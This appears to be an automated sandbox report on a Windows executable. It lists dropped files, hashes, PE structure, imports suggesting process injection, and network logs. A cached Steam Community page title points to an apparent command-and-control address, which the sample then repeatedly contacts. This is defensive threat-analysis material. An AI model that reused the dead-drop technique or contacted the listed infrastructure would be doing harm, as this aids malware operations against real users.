                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):257872
                                                                              Entropy (8bit):6.727482641240852
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):80880
                                                                              Entropy (8bit):6.920480786566406
                                                                              Encrypted:false
                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199686524322[1].htm

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):34771
                                                                              Entropy (8bit):5.384707329935698
                                                                              Encrypted:false
                                                                              SSDEEP:768:Ddpqm+0Ih3YAA9CWGA2fcDAZPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2i:Dd8m+0Ih3YAA9CWGA2FZPzzgiJmDzJtZ
                                                                              MD5:E1272A5DEF427D3C572F30E33137E66F
                                                                              SHA1:2418DEAEC6C03B7E940B235F5B22DF985BA4E51C
                                                                              SHA-256:2E5105A3078B8C83EEA7F86251F0D56C93C6749A5C9ED44A23D06566E9550C24
                                                                              SHA-512:508997728F401092B15DA2FFD91A5275A3BEA4AC87E30ED5DD24811D1D2F6F76013F2E9B43FC898420BD326C7F86FC42DDA8BAFD7F4B3BA81C68A3FAC694B478
                                                                              Malicious:false
                                                                              Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r8p- https://95.217.240.101|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.559890664251954
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:372'224 bytes
                                                                              MD5:75db6dfdebb9bf0d98acfc15f2219c62
                                                                              SHA1:5bc1ceec4269b4e893f2b00c1c4b3c0cb42a3291
                                                                              SHA256:a2f94952c89ea440f82877365db5b4a5cf14a10e4168a22a92fce4a8fd98404f
                                                                              SHA512:b295c110369cb2c56d87aab45ff93961b076474d16ca9a7138ab3e6e7acbc8a13a2949dcbc88e6f2e96e4fae793e1793b3052c7ec390ee3d6cd517029583dd2f
                                                                              SSDEEP:6144:1JhLSp8zWMtAJA0Z9aRlEiw+pVc4Amr7me33k/JNSdiaJIlsZa6n:pLSpmqKRw+84B7mA3aJE4aOAFn
                                                                              TLSH:C384D050B0C08031D663253649E0EBB55E3EF9614F619E9F37A80EBF4F342D2DA61A5B
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.(./.{./.{./.{*].z./.{*].zS/.{*].z./.{*].z./.{./.{./.{;..z./.{;..z./.{;..z./.{...z./.{...z./.{Rich./.{........PE..L....fGf...

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x405cde
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows cui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x66476698 [Fri May 17 14:15:52 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:e0b6966096a2c186c5f52fee6a381e0f

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007F3884E7D9DBh
                                                                              jmp 00007F3884E7D0A9h
                                                                              mov ecx, dword ptr [ebp-0Ch]
                                                                              mov dword ptr fs:[00000000h], ecx
                                                                              pop ecx
                                                                              pop edi
                                                                              pop edi
                                                                              pop esi
                                                                              pop ebx
                                                                              mov esp, ebp
                                                                              pop ebp
                                                                              push ecx
                                                                              ret
                                                                              mov ecx, dword ptr [ebp-10h]
                                                                              xor ecx, ebp
                                                                              call 00007F3884E7CF95h
                                                                              jmp 00007F3884E7D212h
                                                                              push eax
                                                                              push dword ptr fs:[00000000h]
                                                                              lea eax, dword ptr [esp+0Ch]
                                                                              sub esp, dword ptr [esp+0Ch]
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [eax], ebp
                                                                              mov ebp, eax
                                                                              mov eax, dword ptr [0045A500h]
                                                                              xor eax, ebp
                                                                              push eax
                                                                              push dword ptr [ebp-04h]
                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                              mov dword ptr fs:[00000000h], eax
                                                                              ret
                                                                              push eax
                                                                              push dword ptr fs:[00000000h]
                                                                              lea eax, dword ptr [esp+0Ch]
                                                                              sub esp, dword ptr [esp+0Ch]
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [eax], ebp
                                                                              mov ebp, eax
                                                                              mov eax, dword ptr [0045A500h]
                                                                              xor eax, ebp
                                                                              push eax
                                                                              mov dword ptr [ebp-10h], eax
                                                                              push dword ptr [ebp-04h]
                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                              mov dword ptr fs:[00000000h], eax
                                                                              ret
                                                                              push eax
                                                                              push dword ptr fs:[00000000h]
                                                                              lea eax, dword ptr [esp+0Ch]
                                                                              sub esp, dword ptr [esp+0Ch]
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [eax], ebp
                                                                              mov ebp, eax
                                                                              mov eax, dword ptr [0045A500h]
                                                                              xor eax, ebp
                                                                              push eax
                                                                              mov dword ptr [ebp-10h], esp
                                                                              push dword ptr [ebp-04h]
                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                              mov dword ptr fs:[00000000h], eax

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x26b540x28.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1a54.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x250e80x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x250280x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1e0000x15c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x1c59f0x1c600c974584c4e13e2149107eff417dd9cd3False0.5786756607929515data6.607233236723112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x1e0000x933e0x9400f5b90bf6728e730f08e6ae3125e52278False0.39123205236486486data4.691228677009398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x280000x3433c0x33400c7f65d0fd90704e9d511f9e8abbc9eb8False0.9840463033536585data7.984832613465078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .reloc0x5d0000x1a540x1c00898c036d1f57c251ff0d1554c59a02d7False0.7325613839285714data6.391338335451278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Imports

                                                                              DLLImport
                                                                              KERNEL32.dllWaitForSingleObject, CreateRemoteThread, VirtualAlloc, FreeConsole, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EncodePointer, DecodePointer, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 17, 2024 18:05:50.275969982 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:50.276067019 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:50.276166916 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:50.302129984 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:50.302206993 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:51.500148058 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:51.500242949 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:51.735167980 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:51.735254049 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:51.735675097 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:51.735737085 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:51.737740040 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:51.784113884 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.515008926 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.515043974 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.515063047 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.515149117 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:52.515212059 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.515264988 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:52.515264988 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:52.659703970 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.659733057 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.659960032 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:52.660023928 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.660087109 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:52.702033997 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.702147007 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.702244997 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:52.702244997 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:52.702744007 CEST49704443192.168.2.5104.102.42.29
                                                                              May 17, 2024 18:05:52.702786922 CEST44349704104.102.42.29192.168.2.5
                                                                              May 17, 2024 18:05:52.718935966 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:52.718996048 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:52.719536066 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:52.719536066 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:52.719594002 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:54.403044939 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:54.403175116 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:54.413886070 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:54.413906097 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:54.414103031 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:54.414161921 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:54.414673090 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:54.456116915 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:55.392337084 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:55.392419100 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:55.392488003 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:55.392488003 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:55.395876884 CEST49705443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:55.395894051 CEST4434970595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:55.398233891 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:55.398318052 CEST4434970695.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:55.398417950 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:55.398650885 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:55.398685932 CEST4434970695.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:56.921423912 CEST4434970695.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:56.921662092 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:56.922190905 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:56.922218084 CEST4434970695.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:56.923963070 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:56.923975945 CEST4434970695.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:58.233835936 CEST4434970695.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:58.233923912 CEST4434970695.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:58.233968019 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:58.234036922 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:58.234335899 CEST49706443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:58.234360933 CEST4434970695.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:58.236429930 CEST49707443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:58.236515999 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:58.236618996 CEST49707443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:58.236922979 CEST49707443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:58.236948013 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:59.803332090 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:59.803555965 CEST49707443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:59.804317951 CEST49707443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:59.804347038 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:05:59.805931091 CEST49707443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:05:59.805943012 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:01.131469965 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:01.131491899 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:01.131537914 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:01.131748915 CEST49707443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:01.131985903 CEST49707443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:01.132009029 CEST4434970795.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:01.133892059 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:01.133915901 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:01.134006023 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:01.134257078 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:01.134263992 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:02.658077002 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:02.658169031 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:02.658602953 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:02.658608913 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:02.660201073 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:02.660206079 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:04.024296999 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:04.024359941 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:04.024411917 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:04.024425030 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:04.024454117 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:04.024504900 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:04.024507999 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:04.024528980 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:04.024571896 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:04.024940968 CEST49708443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:04.024952888 CEST4434970895.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:04.027388096 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:04.027432919 CEST4434970995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:04.027535915 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:04.027863026 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:04.027904034 CEST4434970995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:05.717668056 CEST4434970995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:05.717744112 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:05.718328953 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:05.718343019 CEST4434970995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:05.719901085 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:05.719908953 CEST4434970995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:07.044429064 CEST4434970995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:07.044559956 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:07.044591904 CEST4434970995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:07.044648886 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:07.044800043 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:07.044842958 CEST4434970995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:07.044897079 CEST49709443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:07.111058950 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:07.111104012 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:07.111166954 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:07.111464977 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:07.111476898 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:08.102535009 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:08.102572918 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:08.102658033 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:08.102884054 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:08.102890968 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:08.585052967 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:08.585375071 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:08.588653088 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:08.588682890 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:08.588902950 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:08.588973045 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:08.589277029 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:08.589329958 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:08.589351892 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:09.339514017 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:09.339612007 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:09.343857050 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:09.343871117 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:09.344834089 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:09.344908953 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:09.345300913 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:09.388118982 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:10.165602922 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:10.165700912 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:10.165726900 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:10.165776968 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:10.166603088 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:10.166641951 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:10.166697025 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.003953934 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.003987074 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.004005909 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.004093885 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.004127026 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.004136086 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.004194975 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.040958881 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.041039944 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.041053057 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.041081905 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.041104078 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.041126966 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.064718962 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.064754009 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.064809084 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.064827919 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.064863920 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.067564964 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.078768969 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.078811884 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.078857899 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.078869104 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.078898907 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.078913927 CEST49712443192.168.2.595.217.240.101
